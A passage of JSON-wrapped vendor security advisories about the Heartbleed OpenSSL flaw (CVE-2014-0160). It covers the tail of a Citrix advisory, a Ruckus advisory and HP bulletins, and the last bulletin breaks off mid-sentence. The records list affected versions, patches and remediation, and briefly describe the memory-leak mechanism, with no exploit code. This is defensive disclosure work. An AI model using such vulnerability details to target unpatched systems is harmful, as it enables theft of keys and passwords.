2010:</b> This component is vulnerable to CVE-2014-0160. An updated version of this component has been released to address this issue. Citrix recommends customers deploy these patches as soon as possible. 
These patches can be found on our website at the following locations:</span></p>\n<p> <span>o Windows - <u> <a href=\"https://support.citrix.com/article/CTX140719\">https://support.citrix.com/article/CTX140719</a></u></span></p>\n<p> <span>o Mac - <u> <a href=\"https://support.citrix.com/article/CTX140730\">https://support.citrix.com/article/CTX140730</a></u></span></p>\n<p> <span>o Linux - <u> <a href=\"https://support.citrix.com/article/CTX140732\">https://support.citrix.com/article/CTX140732</a></u></span></p>\n<p> <span> <b>\u2022 Citrix XenMobile App Controller: </b>XenMobile App Controller versions 2.9 and 2.10 are vulnerable to CVE-2014-0160. Patches have been released to address this issue for both App controller 2.9 and 2.10. Citrix recommends that customers deploy these patches as soon as possible. These patches are available from the following location: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Further information on this can be found in the following blog post: <u> <a href=\"http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/\">http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/</a></u> <a name=\"P17_1652\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDX Toolkit & SDK:</b> MDX Toolkit and SDK Versions 2.2.1 (XenMobile 8.6.1) and 2.3.61 (XenMobile 8.7) use a vulnerable version of OpenSSL when wrapping iOS applications. Enterprise-ready mobile apps on the Worx App Gallery that use this version of Worx SDK also use a vulnerable version of OpenSSL. Outgoing micro VPN network connections to Access Gateway from iOS applications that were wrapped, or Worx SDK enabled, with this version will be encapsulated in a TLS connection that uses a vulnerable version of OpenSSL. 
Citrix has released a new version of the MDX Toolkit & SDK for iOS and Android Build MDX Toolkit; this can be found on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Wrapped Android applications make use of the underlying Android version of OpenSSL, Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for iOS:</b> Worx Home for iOS version 8.7 uses a vulnerable version of OpenSSL. A new version of this software, 8.7.1.27, can be downloaded from the Apple App Store at the following address: <u> <a href=\"https://itunes.apple.com/us/app/worx-home/id434682528?mt=8\">https://itunes.apple.com/us/app/worx-home/id434682528?mt=8</a></u>. Customers that are using wrapped versions of iOS Worx applications are also advised to review the guidance on the MDX Toolkit given above. </span></p>\n<p> <span> <b>\u2022 Receiver for BlackBerry:</b> The Receiver for BlackBerry 10 version 2.0.0.21 is vulnerable to CVE-2014-0160. A new version of the Receiver for BlackBerry 10, 2.0.0.22, can be downloaded from the BlackBerry World website at the following address: <u> <a href=\"http://appworld.blackberry.com/webstore/content/34621918\">http://appworld.blackberry.com/webstore/content/34621918</a></u>. Receiver for PlayBook version 1.0.0 and Receiver for BlackBerry version 2.2 are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Licensing:</b> The Citrix License Server for Windows version 11.11.1, the Citrix License Server VPX version 11.12 and the Citrix Usage Collector are vulnerable to CVE-2014-0160. 
New versions of the License Server for Windows , 11.11.1.13017, and the License Server VPX, 11.12.14001, can be downloaded from the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a></u> </span></p>\n<p> <span> <b>\u2022 Citrix CloudPlatform:</b> The TLS interface exposed by the Secondary Storage VM in Cloud Platform versions 4.2.0, 4.2.1-x and 4.3.0.0 use a version of OpenSSL that is vulnerable to CVE-2014-0160. Citrix has released updated system virtual machine templates to resolve this issue. Citrix recommends that customers update the system virtual machine templates to a patched version and then reboot any Secondary Storage VMs to ensure that the updated OpenSSL version is being used. Instructions on updating the system virtual machine templates can be found in the following Citrix knowledge base article <u> <a href=\"https://support.citrix.com/article/CTX200024\">https://support.citrix.com/article/CTX200024</a></u>.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient XT:</b> XenClient XT versions 3.1.4, 3.2.0, and 3.2.1 are vulnerable to CVE-2014-0160. A new version of XenClient XT, 3.2.2, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html</a></u>. The XenClient XT Synchronizer makes use of the platform provided OpenSSL library. Customers are advised to verify that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient Enterprise:</b> Some versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160. In deployments where the XenClient Synchronizer is only accessed via fully trusted networks, the level of exposure is reduced. 
The TLS libraries used by currently supported versions of the XenClient Enterprise Synchronizer are not vulnerable to CVE-2014-0160. The following versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160: </span></p>\n<p> <span>o 4.1.0, 4.1.1, 4.1.2, 4.1.3, and 4.1.4. Citrix has released a new version of the XenClient Enterprise engine, 4.1.5. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html</a></u></span></p>\n<p> <span>o 4.5.1, 4.5.2, 4.5.3, 4.5.4, and 4.5.5. Citrix has released a new version of the XenClient Enterprise engine, 4.5.6. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45</a></u></span></p>\n<p> <span>o 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4 and 5.0.5. Citrix has released a new version of the XenClient Enterprise engine, 5.0.6. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html</a></u></span></p>\n<p> <span>o 5.1.0, and 5.1.1. Citrix has released a new version of XenClient Enterprise, 5.1.2. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix DesktopPlayer for Mac:</b> DesktopPlayer for Mac version 1.0.x up to and including version 1.0.3 is vulnerable to CVE-2014-0160. 
A new version of the Desktop Player for Mac, 1.0.4, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html\">https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html</a></u>. The TLS libraries used by currently supported versions of the DesktopPlayer Synchronizer are not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That May Require Third Party Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix XenDesktop 7.5:</b> Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of OpenSSL that is not vulnerable to CVE-2014-0160. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <u> <a href=\"https://support.citrix.com/article/CTX140428\">https://support.citrix.com/article/CTX140428</a></u>. Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon covering VMs based on this template can be found at the following location: <u> <a href=\"https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\">https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Android:</b> Receiver for Android makes use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. 
An initial statement by Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u> <a name=\"P43_8077\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for Android:</b> Worx components running on Android make use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement from Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Linux:</b> The TLS libraries included in currently supported versions of Receiver for Linux are not vulnerable to CVE-2014-0160. Version 13.0 of the Receiver for Linux also makes use of the platform provided OpenSSL library. Customers using this version are advised to ensure that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Web Interface:</b> Web Interface makes use of the TLS functionality provided by the underlying web server. Citrix customers are advised to verify that any deployed web servers used to host Web Interface are not vulnerable to this issue. Web Interface can also use a built-in TLS library to make outgoing TLS connections, this library is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Business Manager: </b>This product does not include any TLS libraries and, as such, is not vulnerable to CVE-2014-0160. 
Some customer deployments may make use of an additional SSL proxy component; Citrix advises customers to contact the vendors of any SSL proxy components being used to determine if they are vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That Are Not Impacted:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix Provisioning Services:</b> Currently supported versions of Citrix Provisioning Services are not affected by CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenServer:</b> The TLS libraries used by currently supported versions of XenServer are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix VDI-in-a-Box:</b> The TLS libraries used by currently supported versions of VIAB are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDM Edition: </b>The TLS libraries used by components of XenMobile MDM edition, including the XenMobile Device Manager component, are not vulnerable to CVE-2014-0160<b>.</b></span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Services Manager:</b> The TLS libraries used by currently supported versions of CloudPortal Services Manager are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Windows:</b> The TLS libraries used by currently supported versions of Receiver for Windows are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Mac:</b> The TLS libraries used by currently supported versions of Receiver for Mac are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for iOS:</b> The TLS libraries used by currently supported versions of Receiver for iOS are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix ByteMobile: </b>The TLS libraries used by currently supported versions of ByteMobile are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix NetScaler:</b> The TLS libraries used by currently supported versions 
of the NetScaler product are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Access Gateway</b>:<b> </b>The TLS libraries used by currently supported versions of Access Gateway are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudBridge:</b> The TLS libraries used by currently supported versions of Citrix CloudBridge, including client components, are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Secure Gateway (CSG):</b> The TLS library used by the currently supported version of CSG is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenApp SSLRelay Component:</b> The TLS libraries used by currently supported versions of the XenApp SSLRelay are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Single Sign-on, previously known as Password Manager:</b> The TLS libraries used by currently supported versions of Citrix Single Sign-on are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix StoreFront:</b> The TLS library used by currently supported versions of Citrix Storefront is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Merchandising Server:</b> The TLS library used by the currently supported version of Citrix Merchandising Server is not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Obtaining Support on This Issue</b></span></p>\n<p> <span>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"http://www.citrix.com/site/ss/supportContacts.asp\">http://www.citrix.com/site/ss/supportContacts.asp</a></u>. 
More information on the support status of Citrix products can be found on our website at the following address: <u> <a href=\"http://www.citrix.com/support/product-lifecycle/product-matrix.html\">http://www.citrix.com/support/product-lifecycle/product-matrix.html</a></u>.</span></p>\n<p> <span> <b>Reporting Security Vulnerabilities to Citrix</b></span></p>\n<p> <span>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"/article/CTX081743\">Reporting Security Issues to Citrix</a></span></p>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2014-04-09T04:00:00", "id": "CTX140605", "href": "https://support.citrix.com/article/CTX140605", "title": "CVE-2014-0160 - Citrix Security Advisory for the Heartbleed vulnerability", "type": "citrix", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. 
An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. 
However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent 
to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": 
["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267775\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267775\r\nVersion: 1\r\n\r\nHPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Diagnostics\r\nrunning OpenSSL. OpenSSL is a 3rd party product that is embedded with some of\r\nHP Software products. This bulletin objective is to notify HP Software\r\ncustomers about products affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. 
The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101539)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Diagnostics 9.23 and 9.23 IP1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nCustomers should download the security remediation guidelines from the\r\nfollowing link:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00868126\r\n\r\nHP recommends completing the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . 
Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 - Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNavpgACgkQ4B86/C0qfVkj7QCg0J8cRJO9r8wa9JVIHcIZm0Qx\r\nca0AoO/PCAVZUJX7izSERN0LqreLU3ok\r\n=CUx8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30498", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30498", "title": "[security bulletin] HPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04250814\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04250814\r\nVersion: 1\r\n\r\nHPSBGN03010 rev.1 - HP Software Server Automation, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as 
possible.\r\n\r\nRelease Date: 2014-04-17\r\nLast Updated: 2014-04-17\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101517)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nServer Automation, 10.00, 10.01\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843314/binary/SA_Alert_\r\nHeartbleed_Vulnerability.pdf\r\n\r\nHP recommends following the Server Automation remediation guidelines and\r\ncompleting the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin 
applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 17 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable 